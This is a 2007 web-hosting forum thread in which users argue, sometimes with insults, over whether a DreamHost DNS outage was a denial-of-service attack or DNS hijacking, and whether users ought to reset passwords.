|
 |
|
|
04-09-2007, 11:09 PM
|
Re: DreamHost dns attack
|
Posts: 10
|
I use dreamhost and have not been told to change my password.
|
|
|
|
|
04-10-2007, 04:11 PM
|
Re: DreamHost dns attack
|
Posts: 5,938
Name: Adam for web page design, not program
Location: Toronto, Ontario, Canada
|
The reason Dreamhost didn't tell you to change your password is because they knew that telling you to change any usernames and passwords would do absolutely no good in this instance to stop the traffic, since the root security issue likely isn't one of their servers.
A DoS (Denial of Service) attack is nothing more than a flooding attempt using data packets from false IP addresses. See here: http://www.grc.com/dos/drdos.htm
A Distributed DoS (DDoS) attack or a Distributed Reflected DoS attack uses several computers to attack one victimized computer (in your case, a DNS server), basically resulting in a flood of cappy traffic to the victimized computer.
It has nothing to do with passwords, usernames, or hacking at your server's end. The issue actually occurs externally; a number of machines somewhere in the world have had their security compromised, by accident or design.
(Over)Simply stated, a DoS attack is a flood attack designed to knock a machine offline.
So what can you do about it?
1) Wait for your host to figure out where the traffic is coming and from and be able to stop it. If it's a DDoS attack, they're in for a long fight since the traffic comes from multiple sources and is presumably being sent to multiple ports. They probably are doing something to stop it; but it's an attack where it's easy to get "some" but not "all". If you don't get "all", you still have the problem.
2) Switch your host. |
|
|
|
|
04-10-2007, 04:30 PM
|
Re: DreamHost dns attack
|
Posts: 9
|
Quote:
Originally Posted by ADAM Web Design
The reason Dreamhost didn't tell you to change your password is because they knew that telling you to change any usernames and passwords would do absolutely no good in this instance to stop the traffic, since the root security issue likely isn't one of their servers.
|
Correct - some authority DNS servers had been poisoned
Quote:
Originally Posted by ADAM Web Design
A DoS (Denial of Service) attack is nothing more than a flooding attempt using data packets from false IP addresses. See here: http://www.grc.com/dos/drdos.htm
A Distributed DoS (DDoS) attack or a Distributed Reflected DoS attack uses several computers to attack one victimized computer (in your case, a DNS server), basically resulting in a flood of cappy traffic to the victimized computer. |
I see you are under an impression that it is a DoS attack - which is indeed nothing more than an attempt to overload a server with huge amount of request thus making it to stall. DoS attack can not cause another page appear instead of yours, couldn't it? THIS ISN'T DOS ATTACK (hear me) THIS IS DNS HIJACK ATTACK!
Quote:
Originally Posted by ADAM Web Design
It has nothing to do with passwords, usernames, or hacking at your server's end. The issue actually occurs externally; a number of machines somewhere in the world have had their security compromised, by accident or design.
|
I am sorry in this case you are absolutely WRONG. Poisoned DNS rewrites your domain name to hacker's IP address there this hacker gets your cookies with your usernames and passwords (sometimes encrypted, sometimes not), your email/FTP client authenticates at hacker's IP - he/she logs authentication requests - he/she's got your email/FTP username and password. It's that simple.
Quote:
Originally Posted by ADAM Web Design
(Over)Simply stated, a DoS attack is a flood attack designed to knock a machine offline.
So what can you do about it?
1) Wait for your host to figure out where the traffic is coming and from and be able to stop it. If it's a DDoS attack, they're in for a long fight since the traffic comes from multiple sources and is presumably being sent to multiple ports. They probably are doing something to stop it; but it's an attack where it's easy to get "some" but not "all". If you don't get "all", you still have the problem.
2) Switch your host.
|
It isn't DDoS - it's DNS poisoning we are dealing with here. |
|
|
|
|
04-10-2007, 08:43 PM
|
Re: DreamHost dns attack
|
Posts: 253
Location: Constanta,Romania
|
This things have nothing to do with password, usernames nor dns hijacking.
What can it be done to prevent these things? Nothing.
What can it be done to stop these things?
- Null the traffic coming from the attacker machine. This means the data traffic coming from the source of the attacke is re-routed to an unexisting machine.
- Block the incoming traffic from the source of the attack.
The attacker didn't need any username and password, or any kind of stuff, just a couple of domains to whois them and find out what DNS servers host their zones, than the attack starts. Nothing fancy. |
|
|
|
|
04-11-2007, 01:15 AM
|
Re: DreamHost dns attack
|
Posts: 5,938
Name: Adam for web page design, not program
Location: Toronto, Ontario, Canada
|
Exactly. It's nothing more than a brute force attempt, made worse by hysteria and fear-mongering caused by idiots (like your LZZR buddy) that don't seem to realize that the type of "DNS POISONING" being referred to could just has easily been caused by malware.
in the case of the LZZR guy, he openly admitted to going to AGLOCO, which means he's obviously going places he knows better than to go. He is so far the only one to have reported this as an issue (assuming of course that you're not the same person). How does he know that he didn't have something on his machine that caused it (altered HOSTS file comes to mind immediately)? How does he know that it's not his ISP's DNS that's having issues that way? How does he know that the problem isn't being caused by malfunctioning DNS as the result of overload, which is in turn caused by the very same DoS attack that is happening?
And even if this were true, the solution remains the same.
|
|
|
|
|
04-11-2007, 04:03 AM
|
Re: DreamHost dns attack
|
Posts: 9
|
Quote:
Originally Posted by Raulică
This things have nothing to do with password, usernames nor dns hijacking.
|
Pardon me - it is is exactly what it it DNS Hijack!
Quote:
Originally Posted by Raulică
What can it be done to prevent these things? Nothing.
What can it be done to stop these things? - Null the traffic coming from the attacker machine. This means the data traffic coming from the source of the attacke is re-routed to an unexisting machine.
- Block the incoming traffic from the source of the attack.
The attacker didn't need any username and password, or any kind of stuff, just a couple of domains to whois them and find out what DNS servers host their zones, than the attack starts. Nothing fancy. |
Here I don't understand you - suppose you know DNS server for a domain - so what will you do with it? If you mean just flooding DNS servers - it can be done and it is called DOS attack but mind you DOS will make a victim unable to provide a service, it can not make a victim to provide service with wrong data in it. With DOS you can halt a DNS server but you can not replace data it serves! |
|
|
|
|
04-11-2007, 04:36 AM
|
Re: DreamHost dns attack
|
Posts: 9
|
Quote:
Originally Posted by ADAM Web Design
Exactly. It's nothing more than a brute force attempt, made worse by hysteria and fear-mongering caused by idiots (like your LZZR buddy) that don't seem to realize that the type of "DNS POISONING" being referred to could just has easily been caused by malware.
|
Before calling people I like and respect names I suggest you try thinking for once. I know it may be painful at first but believe me you will get used to it.
Now think: do you believe that the supposed malware activated itself just exactly at the date when Dreamhost started to report problems with their DNS and deactivated when they reported the problem is over?
Quote:
Originally Posted by ADAM Web Design
in the case of the LZZR guy, he openly admitted to going to AGLOCO, which means he's obviously going places he knows better than to go.
|
Are you implying that AGLOCO software is actually your mythical malware - watch out ALGOCO lawyers might not like it.
Quote:
Originally Posted by ADAM Web Design
He is so far the only one to have reported this as an issue (assuming of course that you're not the same person). How does he know that he didn't have something on his machine that caused it (altered HOSTS file comes to mind immediately)?
|
I also have my sites hosted at dreamhost and had the same problem as he describes and I ain't stupid, I checked my hosts file. As for viruses and malware Kaspersky and Dr. Web are your friends.
Quote:
Originally Posted by ADAM Web Design
How does he know that it's not his ISP's DNS that's having issues that way?
|
This is a reasonable question to ask - the answer to it is http://www.dnsstuff.com :-)
Quote:
Originally Posted by ADAM Web Design
How does he know that the problem isn't being caused by malfunctioning DNS as the result of overload, which is in turn caused by the very same DoS attack that is happening?
|
Do you really believe in what you are saying? You suppose that somehow a number of random errors in DNS tables would produce a consistent result resolving all those different domains to the same IP that has got a redirect script pointing to the same landing page. This can only be possible if this IP and this script are standard error handling procedures. Now would you believe that Dreamhost an 1and1 have the same shared advertising account number 19911 at searchportal.information.com? Really?
Quote:
Originally Posted by ADAM Web Design
And even if this were true, the solution remains the same.
|
The same solution means no solution and I agree there is nothing you can do to stop it but you can take precautions. After seeing with my very own eyes how instead of my website appears a searchportal.information.com page and how this page requests my wordpress cookies with my username and password and my browser provides this cookie - I am sorry I am not convinced by your arguments - I did reset my username and password.
Now think again about what you are advocating - you are actually telling people not to reset their usernames and passwords whilst it is in fact a normal security procedure that should be performed at least quarterly if not monthly. You are defending bad practices. Even if it was a hoax I'd rather reset my password than regret that I didn't. |
|
|
|
|
04-12-2007, 01:39 AM
|
Re: DreamHost dns attack
|
Posts: 253
Location: Constanta,Romania
|
Actually starting a DDOS attack to an open port makes the machine overload, and therefore the services malfunction or makes them not to function at all. Like I said nothing fancy, let's take for example the domain google.com:
Quote:
[07:29:35 root@gate functions]# host -t ns google.com
google.com name server ns1.google.com.
google.com name server ns2.google.com.
google.com name server ns3.google.com.
google.com name server ns4.google.com.
[07:29:42 root@gate functions]#
|
Starting a DDOS attack on UDP protol on port 25 on one of these 4 servers may stop google.com resolving properly ( of course in the case of google.com it's almost impossible, I guess :P )
You don't need any username or password to make a domain name not to resolve properly, you just need some balls and a strong internet connection, and of course a fast get away car when the feds knock at your door  . |
|
|
|
|
04-12-2007, 03:09 AM
|
Re: DreamHost dns attack
|
Posts: 5,938
Name: Adam for web page design, not program
Location: Toronto, Ontario, Canada
|
I'm not saying not to reset a username or password. Did I say that? No. I said it is not necessary to reset a username or password in response to misinterpretation and hysteria.
If you know so much about the problem (and by the way, I really don't care who the idiot is that happens to agree with you, assuming it's not you in the first place; the person is still an idiot), why are you *****ing on a random web design board? Why don't you actually go out there and fix it and make some coin off of it? If you were half as good as your high and mighty attitude portray, you'd have had the problem solved yourself with a pretty penny in your pocket.
You don't know what you're talking about. You haven't at any point known what you're talking about. You've misread things. And you're obviously emotionally charged.
Maybe you should be listening to the other host, who would be the last person in the world to defend Dreamhost in this situation, who is saying the same thing I am.
Raulica, thanks for trying to provide some sanity to the proceedings. I think we've got us a genuine lost cause, though.
|
|
|
|
|
04-12-2007, 06:09 AM
|
Re: DreamHost dns attack
|
Posts: 9
|
Quote:
Originally Posted by Raulică
Actually starting a DDOS attack to an open port makes the machine overload, and therefore the services malfunction or makes them not to function at all. Like I said nothing fancy, let's take for example the domain google.com:
............
You don't need any username or password to make a domain name not to resolve properly, you just need some balls and a strong internet connection, and of course a fast get away car when the feds knock at your door . |
Absolutely correct for the DOS - Denial Of Service attack and absolutely not to the point. We are talking about DNS Hijack - not DOS. roses are red, violets are blue you are absolutely correct talking about roses but I was not talking about roses at all - it's violets we are talking about
I don't know if you really need usernames and passwords to Hijack a DNS server but certainly if you go to your own domain and instead of it you land on a page that requests your browser cookies your password security is compromized.
Take Wordpress as an example of common cookie authentication mechanism - if you have not logged out your browser stores cookie for the domain that contains unencrypted username and MD5 encrypted passwords. What happens if someone rewrites DNS data for your domain to another IP and installs a script that will ask for cookies and store this data somewhere? One will have your username and an MD5 hash of your password. If you are using simple password one will be able to crack it in reasonable time with brute force or dictionary attack. Now you are done - you just handed a complete admin access to your wordpress install.
Again what is recommended in this case - RESET YOUR PASSWORD! |
|
|
|
|
04-12-2007, 06:40 AM
|
Re: DreamHost dns attack
|
Posts: 9
|
Quote:
Originally Posted by ADAM Web Design
I'm not saying not to reset a username or password. Did I say that? No. I said it is not necessary to reset a username or password in response to misinterpretation and hysteria.
|
Effectively this is what you are doing - you are denying that problem exists at all hence you misinform you readers with such amount of passion that suggests you might have a vested interest in all this - why would you call reasonable people idiots so many times otherwise?
Quote:
Originally Posted by ADAM Web Design
If you know so much about the problem (and by the way, I really don't care who the idiot is that happens to agree with you, assuming it's not you in the first place; the person is still an idiot),
|
Yep, that's what I meant
Quote:
Originally Posted by ADAM Web Design
why are you *****ing on a random web design board?
|
Exactly for the same reason as you but unlike you I am not trying to flare a flame. I am just giving those who might be concerned a reasonable and timely warning.
Quote:
Originally Posted by ADAM Web Design
Why don't you actually go out there and fix it and make some coin off of it? If you were half as good as your high and mighty attitude portray, you'd have had the problem solved yourself with a pretty penny in your pocket.
|
I don't think you are in a poisition to tell me what to do with my time really 
Quote:
Originally Posted by ADAM Web Design
You don't know what you're talking about. You haven't at any point known what you're talking about. You've misread things. And you're obviously emotionally charged.
|
Now who's having a hysteria attack?
Quote:
Originally Posted by ADAM Web Design
Maybe you should be listening to the other host, who would be the last person in the world to defend Dreamhost in this situation, who is saying the same thing I am.
|
Clud you specify for the audience who the hell is that other host? Is it your friend who too tends to call everyone rasing alert an idiot?
The bottom line is - you are denying the problem which is there and well documented - search for searchportal dns in Google - you'll see that first reports appeared as early as the 4th of April and my friend LZZR was not the first to report it. You will also learn that it affected not only dreamhost and 1and1 but also livejournal and many other sites. Stop denying the obvious! The perpetrators harvested a good buck from redirecting all this traffic to searchportal PPC and now there going to be a second round when they will start using information from harvested cookies.
I am trying to warn people about the danger and prevent this from happening. What you do is assisting them in it. The only question why you are doing it? |
|
|
|
|
04-12-2007, 08:59 AM
|
Re: DreamHost dns attack
|
Posts: 474
Name: Damien
|
BAN, I haven't read anything to suggest that Dreamhost are lying about the issue being caused by a DOS attack on their DNS servers - can you post some evidence of this claim?
Adam was clearly referring to Raulicã as the "other host" - it's pretty obvious when there are only a handful of different posters in the thread, and one happens to have "Future-Host" in their sig.?
__________________
Please login or register to view this content. Registration is FREE :: DDS & Dedicated, UK & USA-based Please login or register to view this content. Registration is FREE, Reseller & Shared Hosting
Experienced Parallels Platinum Partners (Plesk since 2001, Virtuozzo since 2003)
|
|
|
|
|
04-13-2007, 05:52 AM
|
Re: DreamHost dns attack
|
Posts: 3
Name: Ron
|
flame
Last edited by Rampan; 04-13-2007 at 05:58 AM..
|
|
|
|
|
04-13-2007, 06:02 AM
|
Re: DreamHost dns attack
|
Posts: 474
Name: Damien
|
Quote:
Originally Posted by Rampan
BAN reasonable adviser (thanks for alert)
|
Whilst BAN's suggestion of changing passwords is never a bad one. The motive for this advice is still questionable.
On the basis that Dreamhost weren't lying about the DoS attack - which I find to be the most likely explanation - there needs to be some evidence to the contrary to even suggest otherwise.
BAN initially posted two links, one is Dreamhost's official line, and the other provides no evidence to support their claims.
Such a massive cover-up would surely have more evidence against it?
__________________
Please login or register to view this content. Registration is FREE :: DDS & Dedicated, UK & USA-based Please login or register to view this content. Registration is FREE, Reseller & Shared Hosting
Experienced Parallels Platinum Partners (Plesk since 2001, Virtuozzo since 2003)
|
|
|
|
|
04-14-2007, 01:30 AM
|
Re: DreamHost dns attack
|
Posts: 253
Location: Constanta,Romania
|
BAN, if I understood well, DNS hijacking means modification of domain name zone by third unauthorized party, right? Well I am not aware of your curent *nix experience , but in order to do that , you need full root access. If the hijacker had such credentials all dreamhost network could have been compromised, and such thing would be noticed by EVERYONE because keep in mind in order to "clean" a server from "unauthorized individuals" takes at least 3-4 hours, meanwhile a DDOS lasts max. 5 min before the attack is blocked.
Try to understand, it was a simple attack, someone got bored and tried to make some problems. Hijacking a DNS server requires lots of "hacker knowledge" because you need root credentials, and most of these servers are well locked with advanced firewalls.
I'm extremly sorry if I wasn't coherent enough, it's very late and I'm tired.
|
|
|
|
|
|
« Reply to DreamHost dns attack
|
|
|
| Thread Tools |
Search this Thread |
|
|
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
|
